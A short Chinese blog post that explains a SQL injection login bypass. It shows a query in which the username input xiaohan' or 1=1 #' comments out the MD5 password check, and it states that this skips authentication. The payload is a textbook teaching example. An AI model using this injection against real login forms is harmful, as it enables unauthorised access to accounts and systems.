标签:password 用户名 admin where 密码
1、登录时
SELECT * from admin where username=‘xioahan‘ or 1=1 #‘ and MD5(password)=‘d41d8cd98f00b204e9800998ecf8427e‘;
只要在用户名输入框输入xiaohan‘ or 1=1 #‘ 就能注释 密码的认证
本文出自 “映梦_xiaohan” 博客,请务必保留此出处http://yingmeng.blog.51cto.com/5365464/1588674
标签:password 用户名 admin where 密码
原文地址:http://yingmeng.blog.51cto.com/5365464/1588674